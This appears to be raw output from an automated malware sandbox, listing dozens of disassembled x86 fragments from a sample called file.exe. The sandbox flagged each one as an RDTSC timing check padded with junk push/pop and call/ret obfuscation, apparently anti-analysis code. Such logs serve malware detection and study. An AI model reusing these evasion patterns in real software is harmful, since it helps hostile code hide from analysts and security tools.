Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC198B second address: EC198F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC1C25 second address: EC1C4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC5635 second address: D519BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jns 00007FC221A94B40h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jnp 00007FC221A94B3Ah 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c jg 00007FC221A94B47h 0x00000022 pop eax 0x00000023 stc 0x00000024 push dword ptr [ebp+122D04E9h] 0x0000002a jmp 00007FC221A94B37h 0x0000002f call dword ptr [ebp+122D2819h] 0x00000035 pushad 0x00000036 jmp 00007FC221A94B37h 0x0000003b xor eax, eax 0x0000003d jmp 00007FC221A94B34h 0x00000042 mov edx, dword ptr [esp+28h] 0x00000046 stc 0x00000047 sub dword ptr [ebp+122D2F78h], edi 0x0000004d mov dword ptr [ebp+122D2B56h], eax 0x00000053 jmp 00007FC221A94B2Eh 0x00000058 mov esi, 0000003Ch 0x0000005d mov dword ptr [ebp+122D19E9h], edi 0x00000063 add esi, dword ptr [esp+24h] 0x00000067 jno 00007FC221A94B2Ch 0x0000006d lodsw 0x0000006f pushad 0x00000070 jnl 00007FC221A94B2Ch 0x00000076 mov ecx, dword ptr [ebp+122D2B16h] 0x0000007c popad 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 mov dword ptr [ebp+122D1B69h], edx 0x00000087 mov ebx, dword ptr [esp+24h] 0x0000008b clc 0x0000008c nop 0x0000008d push eax 0x0000008e push edx 0x0000008f jnp 00007FC221A94B3Eh 0x00000095 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC57C9 second address: EC57E3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC220745DFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC57E3 second address: EC5810 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC221A94B2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC221A94B37h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC5810 second address: EC584A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC220745DFCh 0x00000008 jnc 00007FC220745DF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 sbb dx, 9FCDh 0x00000016 lea ebx, dword ptr [ebp+12447547h] 0x0000001c mov ecx, dword ptr [ebp+122D2BB2h] 0x00000022 sub ecx, dword ptr [ebp+122D1FF1h] 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FC220745DFFh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC584A second address: EC5854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC221A94B26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC58A7 second address: EC58D8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC220745DF8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d sbb edi, 62603C2Ch 0x00000013 jne 00007FC220745DFCh 0x00000019 push 00000000h 0x0000001b movsx ecx, cx 0x0000001e push A55982BEh 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC58D8 second address: EC58DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC58DC second address: EC58F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC5A12 second address: EC5A1F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC5A1F second address: EC5A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC5B74 second address: EC5B83 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC5B83 second address: EC5B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FC220745DF8h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC5B97 second address: EC5BD4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC221A94B28h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d add ecx, dword ptr [ebp+122D2525h] 0x00000013 lea ebx, dword ptr [ebp+1244755Bh] 0x00000019 jbe 00007FC221A94B2Ch 0x0000001f mov dword ptr [ebp+122D1B75h], edx 0x00000025 xchg eax, ebx 0x00000026 pushad 0x00000027 push esi 0x00000028 jmp 00007FC221A94B30h 0x0000002d pop esi 0x0000002e push eax 0x0000002f push edx 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2E13 second address: EB2E34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745DFAh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007FC220745DFCh 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2E34 second address: EB2E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push esi 0x00000007 pushad 0x00000008 je 00007FC221A94B26h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007FC221A94B2Ah 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2E55 second address: EB2E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE3445 second address: EE346F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FC221A94B36h 0x0000000c js 00007FC221A94B34h 0x00000012 push edi 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop edi 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE35BD second address: EE35D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 jmp 00007FC220745DFBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE3728 second address: EE3751 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007FC221A94B2Eh 0x0000000f pop esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE3751 second address: EE3755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE3755 second address: EE3780 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a js 00007FC221A94B26h 0x00000010 jmp 00007FC221A94B30h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE3780 second address: EE37A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC220745E09h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE3901 second address: EE390C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE390C second address: EE3912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE3912 second address: EE3916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE3916 second address: EE3933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC220745E04h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE3A90 second address: EE3AA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC221A94B32h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE3AA9 second address: EE3AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE3AB1 second address: EE3AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE3AB7 second address: EE3ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC220745E06h 0x0000000f jns 00007FC220745DF6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE3C36 second address: EE3C4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC221A94B34h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE3DA9 second address: EE3DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED8A09 second address: ED8A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB487A second address: EB487E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE4FD1 second address: EE4FFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC221A94B36h 0x00000009 jno 00007FC221A94B26h 0x0000000f popad 0x00000010 push ecx 0x00000011 jno 00007FC221A94B26h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE52D9 second address: EE52DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE52DD second address: EE52E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBCF93 second address: EBCF97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBCF97 second address: EBCFA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FC221A94B32h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBCFA5 second address: EBCFAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBCFAB second address: EBCFAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBCFAF second address: EBCFB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE9778 second address: EE9787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC221A94B26h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE9787 second address: EE978B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE978B second address: EE97C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC221A94B32h 0x0000000e pop edx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jp 00007FC221A94B30h 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE97C3 second address: EE97C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE97C7 second address: EE97D1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE880F second address: EE8813 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEBBA6 second address: EEBBAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEBBAC second address: EEBBB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEBBB0 second address: EEBBC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEBBC4 second address: EEBBDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC220745E04h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EADE30 second address: EADE47 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC221A94B26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jp 00007FC221A94B26h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EADE47 second address: EADE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EADE4C second address: EADE6D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FC221A94B2Fh 0x00000008 jbe 00007FC221A94B26h 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EADE6D second address: EADE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF806 second address: EEF811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC221A94B26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF811 second address: EEF817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB7D99 second address: EB7DAE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC221A94B26h 0x00000008 jmp 00007FC221A94B2Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB7DAE second address: EB7DE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FC220745DFCh 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007FC220745DFEh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF2466 second address: EF247F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FC221A94B26h 0x0000000d jmp 00007FC221A94B2Bh 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF247F second address: EF2485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF2485 second address: EF24C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B2Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e ja 00007FC221A94B2Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007FC221A94B26h 0x0000001c jmp 00007FC221A94B37h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF2BE1 second address: EF2C0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop ecx 0x0000000f pop ebx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007FC220745DF6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF2D3E second address: EF2D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jl 00007FC221A94B28h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF2ECB second address: EF2EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC220745E02h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF2EE1 second address: EF2EFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC221A94B36h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF2EFF second address: EF2F26 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FC220745E09h 0x00000008 jg 00007FC220745DF6h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF2F26 second address: EF2F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF2F2C second address: EF2F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF4C9A second address: EF4CEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 724B437Fh 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007FC221A94B28h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a mov esi, dword ptr [ebp+122D2BAEh] 0x00000030 push 21D0469Dh 0x00000035 je 00007FC221A94B34h 0x0000003b push eax 0x0000003c push edx 0x0000003d jns 00007FC221A94B26h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF530D second address: EF5311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF53D1 second address: EF53D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF53D6 second address: EF53DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF53DC second address: EF53EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b js 00007FC221A94B26h 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF53EE second address: EF53F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF53F3 second address: EF53F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF58D3 second address: EF58E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp], ebx 0x00000008 mov dword ptr [ebp+122D2734h], edi 0x0000000e push eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF58E7 second address: EF58EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5951 second address: EF5957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF59AC second address: EF59BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5C49 second address: EF5C4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5E03 second address: EF5E08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5E08 second address: EF5E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FC220745DF8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D1B79h], ebx 0x0000002c jmp 00007FC220745E00h 0x00000031 mov dword ptr [ebp+124474C8h], ebx 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FC220745E07h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5E71 second address: EF5E77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
